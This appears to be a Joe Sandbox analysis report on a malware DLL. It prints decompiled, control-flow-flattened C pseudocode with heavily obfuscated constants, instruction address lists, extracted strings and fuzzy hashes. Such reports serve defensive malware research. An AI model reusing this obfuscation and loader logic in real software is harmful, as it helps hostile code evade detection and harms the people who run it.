				_v1704 = _v1704 ^ 0x000171c2;
				_v1732 = 0xff6;
				_v1732 = _v1732 + 0xfe15;
				_v1732 = _v1732 + 0x96bf;
				_v1732 = _v1732 << 0xa;
				_v1732 = _v1732 ^ 0x0693792e;
				_v1708 = 0xab38;
				_v1708 = _v1708 | 0x290ab240;
				_v1708 = _v1708 ^ 0x3d842594;
				_v1708 = _v1708 ^ 0x148ed7f1;
				_v1740 = 0xabf1;
				_v1740 = _v1740 + 0x6b39;
				_t524 = 0x4d;
				_v1740 = _v1740 * 0x17;
				_v1740 = _v1740 / _t524;
				_v1740 = _v1740 ^ 0x00001e9b;
				_v1632 = 0xc8c7;
				_v1632 = _v1632 | 0x1dddad59;
				_v1632 = _v1632 ^ 0x1ddda3fd;
				_v1728 = 0x1984;
				_v1728 = _v1728 | 0xe50174fc;
				_v1728 = _v1728 >> 9;
				_v1728 = _v1728 + 0x6ab5;
				_v1728 = _v1728 ^ 0x0072ca13;
				_v1680 = 0xee20;
				_v1680 = _v1680 + 0x6894;
				_v1680 = _v1680 + 0xffff3cc6;
				_v1680 = _v1680 ^ 0x0000b209;
				_v1768 = 0xd586;
				_v1768 = _v1768 * 0x1f;
				_t525 = 0x5b;
				_v1768 = _v1768 / _t525;
				_v1768 = _v1768 >> 9;
				_v1768 = _v1768 ^ 0x00007c3b;
				_v1720 = 0x39b3;
				_v1720 = _v1720 + 0xffff1073;
				_v1720 = _v1720 ^ 0x7e8b47a9;
				_v1720 = _v1720 ^ 0xe8576451;
				_v1720 = _v1720 ^ 0x69231483;
				_v1592 = 0x2734;
				_t526 = 0x59;
				_v1592 = _v1592 * 0x5a;
				_v1592 = _v1592 ^ 0x000db9de;
				_v1752 = 0xd37e;
				_v1752 = _v1752 + 0xffff3b06;
				_v1752 = _v1752 | 0x8ba20300;
				_v1752 = _v1752 + 0xffff0a7e;
				_v1752 = _v1752 ^ 0x8ba122a9;
				_v1736 = 0xfdf5;
				_v1736 = _v1736 ^ 0x4b0a6dd0;
				_v1736 = _v1736 * 0x59;
				_v1736 = _v1736 + 0xffff8d92;
				_v1736 = _v1736 ^ 0x16abd156;
				_v1700 = 0xf9fc;
				_v1700 = _v1700 / _t526;
				_t527 = 0x24;
				_v1700 = _v1700 * 0x7a;
				_v1700 = _v1700 ^ 0x000160f5;
				_v1760 = 0x6097;
				_v1760 = _v1760 + 0x9028;
				_v1760 = _v1760 | 0x26d284d4;
				_v1760 = _v1760 + 0xffff62d1;
				_v1760 = _v1760 ^ 0x26d24200;
				_v1668 = 0x58a3;
				_v1668 = _v1668 / _t527;
				_v1668 = _v1668 | 0xce2be8fd;
				_v1668 = _v1668 ^ 0xce2b9730;
				_v1588 = 0x5dca;
				_v1588 = _v1588 | 0xcb121239;
				_v1588 = _v1588 ^ 0xcb12429b;
				_v1640 = 0xc4d;
				_v1640 = _v1640 ^ 0x11c7ddf0;
				_v1640 = _v1640 ^ 0x11c7841c;
				_v1676 = 0x21f1;
				_v1676 = _v1676 ^ 0x843604aa;
				_v1676 = _v1676 ^ 0x2f7d7e62;
				_v1676 = _v1676 ^ 0xab4b14fa;
				_v1596 = 0xafc7;
				_v1596 = _v1596 << 5;
				_v1596 = _v1596 ^ 0x0015f7ef;
				_v1692 = 0x8fa7;
				_t528 = 0x5a;
				_v1692 = _v1692 * 0x7c;
				_v1692 = _v1692 + 0x4cbf;
				_v1692 = _v1692 ^ 0x004598ea;
				_v1744 = 0x9dac;
				_v1744 = _v1744 | 0xb7a8ffb3;
				_v1744 = _v1744 / _t528;
				_v1744 = _v1744 ^ 0x020a4ecc;
				_v1652 = 0x6ace;
				_v1652 = _v1652 << 9;
				_v1652 = _v1652 ^ 0x00d5de13;
				_v1660 = 0xce58;
				_t529 = 3;
				_v1660 = _v1660 / _t529;
				_v1660 = _v1660 ^ 0xb363bbfe;
				_v1660 = _v1660 ^ 0xb36386d8;
				_v1748 = 0x5863;
				_v1748 = _v1748 | 0xab415f7d;
				_t530 = 0x38;
				_v1748 = _v1748 * 0x69;
				_v1748 = _v1748 ^ 0x3fd727f3;
				_v1748 = _v1748 ^ 0x020739d0;
				_v1608 = 0xb7;
				_v1608 = _v1608 + 0xffffc806;
				_v1608 = _v1608 ^ 0xffffd476;
				_v1600 = 0x1ae1;
				_v1600 = _v1600 / _t530;
				_v1600 = _v1600 ^ 0x00002061;
				_v1756 = 0x997c;
				_v1756 = _v1756 + 0xf405;
				_v1756 = _v1756 >> 4;
				_v1756 = _v1756 << 1;
				_v1756 = _v1756 ^ 0x0000255b;
				_v1764 = 0x43d1;
				_v1764 = _v1764 + 0x2011;
				_v1764 = _v1764 >> 6;
				_v1764 = _v1764 + 0xffff3985;
				_v1764 = _v1764 ^ 0xffff5831;
				_v1772 = 0x27fc;
				_v1772 = _v1772 << 4;
				_v1772 = _v1772 + 0xffff71df;
				_t531 = 0x70;
				_v1772 = _v1772 / _t531;
				_v1772 = _v1772 ^ 0x0000090e;
				_v1604 = 0xd94c;
				_t532 = 0x25;
				_v1604 = _v1604 * 0x68;
				_v1604 = _v1604 ^ 0x00581092;
				_v1624 = 0x5ea0;
				_v1624 = _v1624 * 0x74;
				_v1624 = _v1624 ^ 0x002af6cb;
				_v1636 = 0x3082;
				_v1636 = _v1636 >> 6;
				_v1636 = _v1636 ^ 0x00003692;
				_v1644 = 0x999e;
				_v1644 = _v1644 | 0x39006ece;
				_v1644 = _v1644 ^ 0x3900e31d;
				_v1684 = 0x1097;
				_v1684 = _v1684 | 0x83c0eeba;
				_v1684 = _v1684 / _t532;
				_v1684 = _v1684 ^ 0x038f86d4;
				_v1712 = 0xa774;
				_v1712 = _v1712 + 0xffffc475;
				_v1712 = _v1712 | 0x6e7db387;
				_v1712 = _v1712 ^ 0x6e7dd3da;
				_v1688 = 0xa5c3;
				_v1688 = _v1688 ^ 0xe96270b2;
				_v1688 = _v1688 * 0x25;
				_v1688 = _v1688 ^ 0xbb48b417;
				_v1612 = 0x2ed1;
				_t533 = 0x2c;
				_v1612 = _v1612 / _t533;
				_v1612 = _v1612 ^ 0x00007f35;
				_v1620 = 0x6bc9;
				_v1620 = _v1620 | 0x4f77e0ce;
				_v1620 = _v1620 ^ 0x4f778e3b;
				_v1672 = 0x5319;
				_v1672 = _v1672 | 0xbd54dbc0;
				_t534 = 0x61;
				_v1672 = _v1672 / _t534;
				_v1672 = _v1672 ^ 0x01f3c105;
				_v1628 = 0x8018;
				_v1628 = _v1628 << 0xb;
				_v1628 = _v1628 ^ 0x0400ec78;
				_v1716 = 0x3982;
				_v1716 = _v1716 | 0xa6eae1a8;
				_v1716 = _v1716 + 0xa320;
				_v1716 = _v1716 + 0xffffdd5b;
				_v1716 = _v1716 ^ 0xa6eb35eb;
				_v1656 = 0xdd8c;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 + 0xffff2d32;
				_v1656 = _v1656 ^ 0xffff529e;
				_v1664 = 0xdc2e;
				_v1664 = _v1664 ^ 0x013d526f;
				_t535 = 0x14;
				_t518 = _v1584;
				_v1664 = _v1664 / _t535;
				_v1664 = _v1664 ^ 0x000fe0b7;
				while(1) {
					L1:
					_t536 = 0x5c;
					while(1) {
						L2:
						_t494 = 0x161f11dd;
						do {
							L3:
							if(_t590 == _t494) {
								_t495 = E1001232B(_v1712,  &_v1560, _v1688);
								_pop(_t538);
								_t498 = E100041AA(_v1580, _v1612, _v1664, _t538, _t518, _v1620, _v1672, _v1628,  &_v1560, 2 + _t495 * 2);
								_t595 =  &(_t595[8]);
								__eflags = _t498;
								_t590 = 0x2ed72160;
								_t451 = _t498 == 0;
								__eflags = _t451;
								_v1584 = 0 | _t451;
								goto L19;
							} else {
								if(_t590 == 0x184e3bc6) {
									_push(_t536);
									E1000471A(_v1724,  &_v520, _v1696, _v1704, _v1732, _v1708, _v1740);
									_t595 =  &(_t595[8]);
									_t590 = 0x26d2b2b4;
									goto L1;
								} else {
									if(_t590 == 0x1977399b) {
										_push(0x10001368);
										_push(_v1652);
										_push(_v1744);
										_t542 = _v1596;
										__eflags = E10010A84(E10005DFC(_v1596, _v1692, __eflags), _v1660, _v1648, _v1748, _v1608, _v1596, _v1600, _v1596,  &_v1580, _v1616, _t542, _t542, _v1756, _v1764, _v1772, _v1604, _t542, _v1624);
										_t590 =  ==  ? 0x161f11dd : 0x12170868;
										E10010D6D(_v1636, _v1644, _v1684, _t502);
										_t595 =  &(_t595[0x15]);
										L19:
										_t494 = 0x161f11dd;
										_t536 = 0x5c;
										goto L20;
									} else {
										if(_t590 == 0x1bdb9a1c) {
											_t520 =  *0x10021088 + 0x38;
											while(1) {
												__eflags =  *_t520 - _t536;
												if(__eflags == 0) {
													break;
												}
												_t520 = _t520 + 2;
												__eflags = _t520;
											}
											_t518 = _t520 + 2;
											_t590 = 0x1977399b;
											goto L2;
										} else {
											if(_t590 == 0x26d2b2b4) {
												_push(0x10001308);
												_push(_v1768);
												_push(_v1680);
												_t507 = E10005DFC(_v1632, _v1728, __eflags);
												E1001D4E1( &_v1040, __eflags);
												E100098C5(0x104, __eflags, _v1720, _v1592, _v1752, _v1736, _v1700,  *0x10021088 + 0x254, _v1760, _v1668,  &_v1040,  *0x10021088 + 0x38, _t507,  &_v520);
												E10010D6D(_v1588, _v1640, _v1676, _t507);
												_t595 =  &(_t595[0x11]);
												_t590 = 0x1bdb9a1c;
												while(1) {
													L1:
													_t536 = 0x5c;
													L2:
													_t494 = 0x161f11dd;
													goto L3;
												}
											} else {
												if(_t590 != 0x2ed72160) {
													goto L20;
												} else {
													E100170CF(_v1716, _v1656, _v1580);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1584;
							L20:
							__eflags = _t590 - 0x12170868;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}

0x10013590
0x10013596
0x100135a3
0x100135ac
0x100135b7
0x100135c2
0x100135ce
0x100135d5
0x100135e0
0x100135e5
0x100135eb
0x100135f3
0x100135f8
0x10013600
0x10013612
0x10013617
0x10013620
0x1001362b
0x10013636
0x1001363e
0x10013646
0x1001364e
0x10013653
0x1001365b
0x10013663
0x1001366f
0x10013674
0x1001367a
0x1001367f
0x10013687
0x1001368f
0x10013697
0x1001369f
0x100136a4
0x100136ac
0x100136b4
0x100136bc
0x100136c4
0x100136cc
0x100136d4
0x100136e1
0x100136e2
0x100136ec
0x100136f0
0x100136f8
0x10013703
0x1001370e
0x10013719
0x10013721
0x10013729
0x1001372e
0x10013736
0x1001373e
0x10013746
0x1001374e
0x10013756
0x1001375e
0x1001376b
0x10013777
0x1001377c
0x10013782
0x10013787
0x1001378f
0x10013797
0x1001379f
0x100137a7
0x100137af
0x100137b7
0x100137ca
0x100137cd
0x100137d4
0x100137df
0x100137e7
0x100137ef
0x100137f7
0x100137ff
0x10013807
0x1001380f
0x1001381c
0x10013820
0x10013828
0x10013830
0x10013840
0x10013849
0x1001384c
0x10013850
0x10013858
0x10013860
0x10013868
0x10013870
0x10013878
0x10013880
0x10013890
0x10013894
0x1001389c
0x100138a4
0x100138af
0x100138ba
0x100138c5
0x100138d0
0x100138db
0x100138e6
0x100138ee
0x100138f6
0x100138fe
0x10013906
0x10013911
0x10013919
0x10013924
0x10013931
0x10013932
0x10013936
0x1001393e
0x10013946
0x1001394e
0x1001395c
0x10013960
0x10013968
0x10013973
0x1001397b
0x10013986
0x1001399c
0x100139a1
0x100139aa
0x100139b5
0x100139c0
0x100139c8
0x100139d5
0x100139d8
0x100139dc
0x100139e4
0x100139ec
0x100139f7
0x10013a02
0x10013a0d
0x10013a23
0x10013a2a
0x10013a35
0x10013a3d
0x10013a45
0x10013a4a
0x10013a4e
0x10013a56
0x10013a5e
0x10013a66
0x10013a6b
0x10013a73
0x10013a7b
0x10013a83
0x10013a88
0x10013a94
0x10013a99
0x10013a9f
0x10013aa7
0x10013aba
0x10013abb
0x10013ac2
0x10013acd
0x10013ae0
0x10013ae7
0x10013af2
0x10013afd
0x10013b05
0x10013b10
0x10013b1b
0x10013b26
0x10013b31
0x10013b39
0x10013b47
0x10013b4b
0x10013b53
0x10013b5b
0x10013b63
0x10013b6b
0x10013b73
0x10013b7b
0x10013b88
0x10013b8c
0x10013b96
0x10013baa
0x10013baf
0x10013bb8
0x10013bc8
0x10013bd3
0x10013bde
0x10013be9
0x10013bf1
0x10013bfd
0x10013c02
0x10013c08
0x10013c10
0x10013c1b
0x10013c23
0x10013c2e
0x10013c36
0x10013c3e
0x10013c46
0x10013c4e
0x10013c56
0x10013c61
0x10013c69
0x10013c74
0x10013c7f
0x10013c8a
0x10013c9c
0x10013c9f
0x10013ca6
0x10013caa
0x10013cb2
0x10013cb2
0x10013cb4
0x10013cb5
0x10013cb5
0x10013cb5
0x10013cba
0x10013cba
0x10013cbc
0x10013ed9
0x10013ede
0x10013f1b
0x10013f22
0x10013f25
0x10013f27
0x10013f2c
0x10013f2c
0x10013f2f
0x00000000
0x10013cc2
0x10013cc8
0x10013e97
0x10013eb8
0x10013ebd
0x10013ec0
0x00000000
0x10013cce
0x10013cd0
0x10013deb
0x10013df0
0x10013df7
0x10013dff
0x10013e65
0x10013e87
0x10013e8a
0x10013e8f
0x10013f36
0x10013f38
0x10013f3d
0x00000000
0x10013cd6
0x10013cdc
0x10013dd4
0x10013ddc
0x10013ddc
0x10013ddf
0x00000000
0x00000000
0x10013dd9
0x10013dd9
0x10013dd9
0x10013de1
0x10013de4
0x00000000
0x10013ce2
0x10013ce8
0x10013d20
0x10013d25
0x10013d29
0x10013d38
0x10013d46
0x10013da1
0x10013dbc
0x10013dc1
0x10013dc4
0x10013cb2
0x10013cb2
0x10013cb4
0x10013cb5
0x10013cb5
0x00000000
0x10013cb5
0x10013cea
0x10013cf0
0x00000000
0x10013cf6
0x10013d08
0x10013d0d
0x10013cf0
0x10013ce8
0x10013cdc
0x10013cd0
0x10013cc8
0x10013d0e
0x10013d1f
0x10013f3e
0x10013f3e
0x10013f3e
0x00000000
0x10013f4a
0x10013cb5

Strings

a , xrefs: 10013A2A
%x, xrefs: 10013600
9k, xrefs: 100136D4
[%, xrefs: 10013A4E
b~}/, xrefs: 100138F6
x, xrefs: 10013C23
/n, xrefs: 1001362B
;|, xrefs: 10013787
QdW, xrefs: 100137A7
4', xrefs: 100137B7
cX, xrefs: 100139C0
, xrefs: 1001373E

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $%x$/n$4'$9k$;|$QdW$[%$a $b~}/$cX$x
API String ID: 0-2114610450
Opcode ID: 90e83f1b61ec0ffcb7e3a106c4862b59fc10ed41331de0d97bbdbfec3c64722d
Instruction ID: af9174c4d97948e7ef2e8c599c7e26ea03327e682a9a7bcbde38a2640a6d7a50
Opcode Fuzzy Hash: 90e83f1b61ec0ffcb7e3a106c4862b59fc10ed41331de0d97bbdbfec3c64722d
Instruction Fuzzy Hash: EC32F371509380DFE368CF25D98AB8BBBE2FBC5344F10891DE199862A0D7B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 1000CAA3 Relevance: 15.4, Strings: 12, Instructions: 375
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E1000CAA3(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				intOrPtr _t372;
				void* _t379;
				signed int _t381;
				intOrPtr _t385;
				intOrPtr _t393;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				void* _t402;
				void* _t428;
				intOrPtr* _t437;
				void* _t440;
				intOrPtr _t444;
				signed int* _t446;
				void* _t448;

				_push(_a12);
				_push(_a8);
				_v12 = __edx;
				_push(_a4);
				_push(__edx);
				E10012550(__edx);
				_v164 = 0xccf8;
				_t446 =  &(( &_v168)[5]);
				_t444 = 0;
				_t440 = 0x5b8b322;
				_t393 = 0;
				_t395 = 0x39;
				_v164 = _v164 * 0x47;
				_v164 = _v164 * 0x3b;
				_v164 = _v164 + 0xffffb5ce;
				_v164 = _v164 ^ 0x0d199a53;
				_v48 = 0x6ac5;
				_v48 = _v48 ^ 0x000067e6;
				_v120 = 0xab9;
				_v120 = _v120 + 0xffffc5bb;
				_v120 = _v120 >> 0xb;
				_v120 = _v120 * 0x34;
				_v120 = _v120 ^ 0x067fd26a;
				_v64 = 0x3f6b;
				_v64 = _v64 | 0x8301b69e;
				_v64 = _v64 ^ 0xf453b1d5;
				_v64 = _v64 ^ 0x7752766c;
				_v136 = 0x6672;
				_v136 = _v136 / _t395;
				_v136 = _v136 >> 2;
				_v136 = _v136 + 0x3c5d;
				_v136 = _v136 ^ 0x00000609;
				_v72 = 0x83af;
				_v72 = _v72 + 0xffff692b;
				_v72 = _v72 << 0xe;
				_v72 = _v72 ^ 0xfb36aaa0;
				_v144 = 0x1094;
				_v144 = _v144 << 3;
				_v144 = _v144 >> 1;
				_v144 = _v144 << 2;
				_v144 = _v144 ^ 0x000104fb;
				_v52 = 0xbbd9;
				_v52 = _v52 >> 0xa;
				_v52 = _v52 ^ 0x000007b3;
				_v56 = 0xb390;
				_v56 = _v56 | 0xd4330ee7;
				_v56 = _v56 ^ 0xd433f5ab;
				_v80 = 0x1d14;
				_v80 = _v80 ^ 0xe2529727;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0x94518475;
				_v152 = 0x78c0;
				_v152 = _v152 + 0xffffa07a;
				_v152 = _v152 | 0x12864170;
				_v152 = _v152 + 0xffff96fb;
				_v152 = _v152 ^ 0x12858604;
				_v88 = 0x362c;
				_v88 = _v88 + 0x273d;
				_v88 = _v88 | 0x7b30ce6c;
				_v88 = _v88 ^ 0x7b308180;
				_v160 = 0x1107;
				_t396 = 0xd;
				_v160 = _v160 / _t396;
				_v160 = _v160 + 0xaf20;
				_v160 = _v160 << 0xe;
				_v160 = _v160 ^ 0x2c1bf631;
				_v28 = 0x16fd;
				_v28 = _v28 ^ 0xc6d3337a;
				_v28 = _v28 ^ 0xc6d3649c;
				_v128 = 0xb310;
				_v128 = _v128 + 0x60af;
				_t397 = 0x11;
				_v128 = _v128 * 0x17;
				_v128 = _v128 >> 0x10;
				_v128 = _v128 ^ 0x00003f03;
				_v108 = 0x969;
				_v108 = _v108 + 0x5b76;
				_v108 = _v108 | 0x469c96ef;
				_v108 = _v108 + 0xd995;
				_v108 = _v108 ^ 0x469dfd2d;
				_v24 = 0xa535;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x014a08df;
				_v116 = 0x2d09;
				_v116 = _v116 / _t397;
				_v116 = _v116 << 0xf;
				_t398 = 0x5a;
				_v116 = _v116 * 0x1d;
				_v116 = _v116 ^ 0x266728a5;
				_v156 = 0xc20b;
				_v156 = _v156 + 0xffff4ceb;
				_v156 = _v156 + 0x3710;
				_v156 = _v156 >> 6;
				_v156 = _v156 ^ 0x000023ae;
				_v60 = 0x9b8;
				_v60 = _v60 + 0xbf87;
				_v60 = _v60 ^ 0x000089a9;
				_v132 = 0x3af8;
				_v132 = _v132 / _t398;
				_v132 = _v132 ^ 0xca87d414;
				_v132 = _v132 + 0xffff6282;
				_v132 = _v132 ^ 0xca8759f3;
				_v92 = 0x2786;
				_v92 = _v92 + 0x26b3;
				_v92 = _v92 | 0x1d28531e;
				_v92 = _v92 ^ 0x1d28279a;
				_v140 = 0x492b;
				_v140 = _v140 + 0xffff62ea;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 << 3;
				_v140 = _v140 ^ 0x001f936e;
				_v40 = 0x294b;
				_v40 = _v40 | 0x90a98536;
				_v40 = _v40 ^ 0x90a99c6f;
				_v124 = 0x1400;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xffffb6e1;
				_v124 = _v124 >> 0xa;
				_v124 = _v124 ^ 0x00026da1;
				_v148 = 0x1dcc;
				_v148 = _v148 + 0xffff7172;
				_v148 = _v148 ^ 0x59a54da9;
				_t399 = 0x3a;
				_v148 = _v148 / _t399;
				_v148 = _v148 ^ 0x02de527e;
				_v96 = 0xc2c0;
				_t400 = 0x59;
				_v96 = _v96 / _t400;
				_v96 = _v96 | 0x601f9634;
				_v96 = _v96 ^ 0x601fa5fc;
				_v68 = 0x5993;
				_v68 = _v68 + 0x3c37;
				_t401 = 0x27;
				_v68 = _v68 * 0x42;
				_v68 = _v68 ^ 0x00269f78;
				_v100 = 0x35d8;
				_v100 = _v100 + 0xf370;
				_v100 = _v100 + 0x85ef;
				_v100 = _v100 ^ 0x0001fecf;
				_v36 = 0x96a8;
				_v36 = _v36 << 4;
				_v36 = _v36 ^ 0x00096afa;
				_v84 = 0x6657;
				_v84 = _v84 / _t401;
				_v84 = _v84 + 0x88b2;
				_v84 = _v84 ^ 0x0000efd0;
				_v44 = 0x5846;
				_v44 = _v44 ^ 0xc187cff1;
				_v44 = _v44 ^ 0xc187ccd9;
				_v112 = 0x4c1b;
				_v112 = _v112 + 0xffffc101;
				_v112 = _v112 ^ 0x97fe48a5;
				_v112 = _v112 + 0xffff20cb;
				_v112 = _v112 ^ 0x97fd2571;
				_v32 = 0x3b02;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00000761;
				_v168 = 0x7902;
				_v168 = _v168 >> 0x10;
				_v168 = _v168 >> 9;
				_v168 = _v168 ^ 0x00000001;
				_v76 = 0x42c9;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 ^ 0xe5acdda9;
				_v76 = _v76 ^ 0xe5acddac;
				_t437 = _v16;
				while(1) {
					L1:
					_t372 = _v104;
					while(1) {
						L2:
						_t428 = 0x137be7af;
						while(1) {
							L3:
							_t402 = 0x1f61ce4d;
							while(1) {
								L4:
								_t448 = _t440 - _t402;
								if(_t448 > 0) {
									goto L19;
								}
								L5:
								if(_t448 == 0) {
									E1000E48F(_v96, _v168, _v12, _v68, _v100, _t444);
									_t446 =  &(_t446[4]);
									L18:
									_t440 = 0x1e16564f;
									while(1) {
										L1:
										_t372 = _v104;
										goto L2;
									}
								} else {
									if(_t440 == 0x5b8b322) {
										_t440 = 0x1e3d7d53;
										continue;
									} else {
										if(_t440 == 0x6fb8319) {
											_t385 = E10010321(_a4, _v76, _v108, _v24,  *_t437);
											_t446 =  &(_t446[3]);
											_v20 = _t385;
											_t372 = _v104;
											_t428 = 0x137be7af;
											_t440 =  !=  ? 0x137be7af : 0x2332be2e;
											goto L3;
										} else {
											if(_t440 == _t428) {
												E100107A6(_t444, _v116, _v20,  &_v8, _v32, _t402, _v156, _v60, _v132, _v92);
												_t440 =  !=  ? 0x1f61ce4d : 0x2332be2e;
												_t372 = E10005AB8(_v140, _v40, _v124, _v148, _v20);
												_t446 =  &(_t446[0xb]);
												_t402 = 0x1f61ce4d;
												_t428 = 0x137be7af;
												goto L31;
											} else {
												if(_t440 == 0x1e16564f) {
													E1000DE81(_v36, _t444, _v84);
													_t440 = 0x35ec3230;
													while(1) {
														L1:
														_t372 = _v104;
														goto L2;
													}
												} else {
													if(_t440 != 0x1e3d7d53) {
														L31:
														if(_t440 != 0x2c302295) {
															_t372 = _v104;
															continue;
														}
													} else {
														_push(_t402);
														_t372 = E100054FB(0x20000);
														_t393 = _t372;
														if(_t393 != 0) {
															_t440 = 0x26c6e589;
															while(1) {
																L1:
																_t372 = _v104;
																L2:
																_t428 = 0x137be7af;
																L3:
																_t402 = 0x1f61ce4d;
																while(1) {
																	L4:
																	_t448 = _t440 - _t402;
																	if(_t448 > 0) {
																		goto L19;
																	}
																	goto L5;
																}
																goto L19;
															}
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _t372;
								L33:
								L19:
								if(_t440 == 0x2332be2e) {
									_t437 = _t437 + 0x2c;
									if(_t437 >= _t372) {
										_t440 = 0x1e16564f;
										goto L31;
									} else {
										_t440 = 0x6fb8319;
										continue;
									}
								} else {
									if(_t440 == 0x26c6e589) {
										_push(_t402);
										_t444 = E100054FB(0x2000);
										_t440 =  !=  ? 0x2b10f021 : 0x35ec3230;
										goto L1;
									} else {
										_t372 = 0x2b10f021;
										if(_t440 == 0x2b10f021) {
											_t379 = E1000EBC8(_t402, _t428, _v136, _t402, _v72, _t402, _t402,  &_v4, _v144, _t402, _v52, _t393, _v56, _v80, _v152,  &_v16, _v88, _v160, _v28, _a4);
											_t446 =  &(_t446[0x12]);
											if(_t379 == 0) {
												goto L18;
											} else {
												_t381 = E1000A156();
												_t440 = 0x6fb8319;
												_t372 = _v16 * 0x2c + _t393;
												_v104 = _t372;
												_t437 =  >=  ? _t393 : (_t381 & 0x0000001f) * 0x2c + _t393;
												goto L2;
											}
											goto L33;
										} else {
											if(_t440 == 0x35ec3230) {
												return E1000DE81(_v44, _t393, _v112);
											}
											goto L31;
										}
									}
								}
								goto L24;
							}
						}
					}
				}
			}

0x1000caad
0x1000cab6
0x1000cabd
0x1000cac4
0x1000cacb
0x1000cacd
0x1000cad2
0x1000cada
0x1000cae4
0x1000cae6
0x1000caeb
0x1000caef
0x1000caf0
0x1000cafb
0x1000caff
0x1000cb07
0x1000cb0f
0x1000cb28
0x1000cb33
0x1000cb3b
0x1000cb43
0x1000cb4d
0x1000cb51
0x1000cb59
0x1000cb61
0x1000cb69
0x1000cb71
0x1000cb79
0x1000cb89
0x1000cb8d
0x1000cb92
0x1000cb9a
0x1000cba2
0x1000cbaa
0x1000cbb2
0x1000cbb7
0x1000cbbf
0x1000cbc7
0x1000cbcc
0x1000cbd0
0x1000cbd5
0x1000cbdd
0x1000cbe8
0x1000cbf0
0x1000cbfb
0x1000cc06
0x1000cc11
0x1000cc1c
0x1000cc24
0x1000cc2c
0x1000cc31
0x1000cc39
0x1000cc41
0x1000cc49
0x1000cc51
0x1000cc59
0x1000cc61
0x1000cc69
0x1000cc71
0x1000cc79
0x1000cc81
0x1000cc8d
0x1000cc90
0x1000cc96
0x1000cc9e
0x1000cca3
0x1000ccab
0x1000ccb6
0x1000ccc1
0x1000cccc
0x1000ccd4
0x1000cce3
0x1000cce6
0x1000ccea
0x1000ccef
0x1000ccf7
0x1000ccff
0x1000cd07
0x1000cd0f
0x1000cd17
0x1000cd1f
0x1000cd2a
0x1000cd32
0x1000cd3d
0x1000cd4d
0x1000cd51
0x1000cd5b
0x1000cd5e
0x1000cd62
0x1000cd6a
0x1000cd72
0x1000cd7a
0x1000cd82
0x1000cd87
0x1000cd8f
0x1000cd9a
0x1000cda5
0x1000cdb0
0x1000cdc0
0x1000cdc4
0x1000cdcc
0x1000cdd4
0x1000cddc
0x1000cde4
0x1000cdec
0x1000cdf4
0x1000cdfc
0x1000ce04
0x1000ce0c
0x1000ce11
0x1000ce16
0x1000ce1e
0x1000ce29
0x1000ce34
0x1000ce3f
0x1000ce47
0x1000ce4c
0x1000ce54
0x1000ce59
0x1000ce61
0x1000ce69
0x1000ce71
0x1000ce7d
0x1000ce82
0x1000ce86
0x1000ce90
0x1000ce9c
0x1000cea1
0x1000cea7
0x1000ceaf
0x1000ceb7
0x1000cebf
0x1000cecc
0x1000cecd
0x1000ced1
0x1000ced9
0x1000cee1
0x1000cee9
0x1000cef1
0x1000cef9
0x1000cf04
0x1000cf0c
0x1000cf17
0x1000cf25
0x1000cf29
0x1000cf31
0x1000cf39
0x1000cf44
0x1000cf4f
0x1000cf5a
0x1000cf62
0x1000cf6a
0x1000cf72
0x1000cf7a
0x1000cf82
0x1000cf8d
0x1000cf95
0x1000cfa0
0x1000cfa8
0x1000cfad
0x1000cfba
0x1000cfbf
0x1000cfc7
0x1000cfcc
0x1000cfd4
0x1000cfdc
0x1000cfe3
0x1000cfe3
0x1000cfe3
0x1000cfe7
0x1000cfe7
0x1000cfe7
0x1000cfec
0x1000cfec
0x1000cfec
0x1000cff1
0x1000cff1
0x1000cff1
0x1000cff3
0x00000000
0x00000000
0x1000cff9
0x1000cff9
0x1000d14a
0x1000d14f
0x1000d152
0x1000d152
0x1000cfe3
0x1000cfe3
0x1000cfe3
0x00000000
0x1000cfe3
0x1000cfff
0x1000d005
0x1000d128
0x00000000
0x1000d00b
0x1000d011
0x1000d101
0x1000d106
0x1000d109
0x1000d117
0x1000d11b
0x1000d120
0x00000000
0x1000d017
0x1000d019
0x1000d0a4
0x1000d0cb
0x1000d0d2
0x1000d0d7
0x1000d0da
0x1000d0df
0x00000000
0x1000d01b
0x1000d021
0x1000d064
0x1000d06a
0x1000cfe3
0x1000cfe3
0x1000cfe3
0x00000000
0x1000cfe3
0x1000d023
0x1000d029
0x1000d278
0x1000d27e
0x1000d284
0x00000000
0x1000d284
0x1000d02f
0x1000d03f
0x1000d040
0x1000d045
0x1000d04a
0x1000d050
0x1000cfe3
0x1000cfe3
